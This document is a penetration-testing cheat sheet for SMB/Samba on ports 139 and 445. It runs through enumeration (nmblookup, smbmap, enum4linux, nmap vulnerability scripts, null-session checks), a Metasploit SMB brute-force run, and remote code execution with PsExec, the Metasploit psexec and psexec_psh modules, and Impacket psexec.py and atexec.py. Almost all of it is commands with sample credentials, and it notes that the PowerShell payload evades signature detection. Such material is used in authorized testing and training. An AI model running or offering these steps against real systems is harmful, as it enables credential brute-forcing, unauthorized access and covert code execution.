Port 139 and 445- SMB/Samba
How to enumerate port 139/445 (SMB)
Samba is a service that allows the user to share files with other computers. It has interoperability, which means that it can share stuff between Linux and Windows systems. A windows user will simply see an icon for a folder that includes some files. Even though the folder and files actually exist on a Linux-server.
collects NetBIOS over TCP/IP client used to lookup NetBIOS names.
nmblookup -A 192.168.1.101
smbmap -H 192.168.1.101 nmap --script smb-enum-shares -p 139,445 192.168.1.101
Check for Null Sessions:
smbmap -H 192.168.1.101 # A tool to execute client side MS-RPC functions ((-U "" - null session )(-N - no password)) rpcclient -U "" -N 192.168.1.101 #An ftp-like client to access SMB shares smbclient -L 192.168.1.101 smbclient \\\\192.168.1.101\\[share name]
Nmap scan for Vulnerabilities:
nmap --script smb-vuln* -p 139,445 192.168.1.101
Enumerates various smb functions such as :
- output similar to nmblookup
- check for null session
- listing of shares
- domain info
- password policy
- RID cycling output
enum4linux -a 192.168.1.101
Detect SMB version (Metasploit):
msf auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/smb_version msf auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.101 RHOSTS => 192.168.1.101 msf auxiliary(scanner/smb/smb_version) > run [*] 192.168.1.101:139 - Host could not be identified: Unix (Samba 2.2.1a)
SMB brute force:
This module will test a SMB login on a range of machines and report successful logins.
use auxiliary/scanner/smb/smb_login msf exploit (smb_login)>set rhosts 192.168.1.101 msf exploit (smb_login)>set user_file /root/Desktop/users.txt msf exploit (smb_login)>set pass_file /root/Desktop/passwords.txt msf exploit (smb_login)>set stop_on_success true msf exploit (smb_login)>exploit
Connectin with PSExec:
Psexec.exe is software that helps us to access other machines in a network. This software directly takes us to the shell of the remote PC with the advantage of doing nothing manually. Download this software from –> http://download.sysinternals.com/files/PSTools.zip.
#After extracting the file do the following: PsExec.exe \\192.168.1.101 -u administrator -p [email protected] cmd
Connectin with PSExec (Metasploit):
If you have SMB credentials you can use psexec to easily log in. You can either use the standalone binary or the metasploit module.
Windows Authenticated User Code Execution:
This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is similar to the “psexec” utility provided by SysInternals.
msf > use exploit/windows/smb/psexec msf exploit windows/smb/psexec) > set rhost 192.168.1.101 msf exploit(windows/smb/psexec) > set smbuser administrator msf exploit(windows/smb/psexec) > set smbpass [email protected] msf exploit(windows/smb/psexec) > exploit
Windows Authenticated Powershell Command Execution:
This module uses a valid administrator username and password to execute a PowerShell payload using a similar method to the “psexec” utility provided by SysInternals. The payload is encoded in base64 and executed from the command line using the –encoded command flag. By using this method, the payload is never written to disk, and given that each payload is unique, is less prone to signature-based detection.
msf > use exploit/windows/smb/psexec_psh msf exploit(windows/smb/psexec_psh) > set rhost 192.168.1.101 msf exploit(windows/smb/psexec_psh) > set smbuser administrator msf exploit(windows/smb/psexec_psh) > set smbpass [email protected] msf exploit(windows/smb/psexec_psh) > exploit
Connectin with PSExec (Python):
Impacket for Psexec.py:
Psexec.py lets you execute processes on remote windows systems, copy files on remote systems, process their output and stream it back. It allows execution of remote shell commands directly with the full interactive console without having to install any client software.
git clone https://github.com/CoreSecurity/impacket.git cd impacket/ python setup.py install cd examples
python psexec.py SERVER/Administrator:[email protected]
Impacket for Atexec.py:
This tool executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.
git clone https://github.com/CoreSecurity/impacket.git cd impacket/ python setup.py install cd examples python atexec.py SERVER/Administrator:Ignite123@192.168.1.104 systeminfo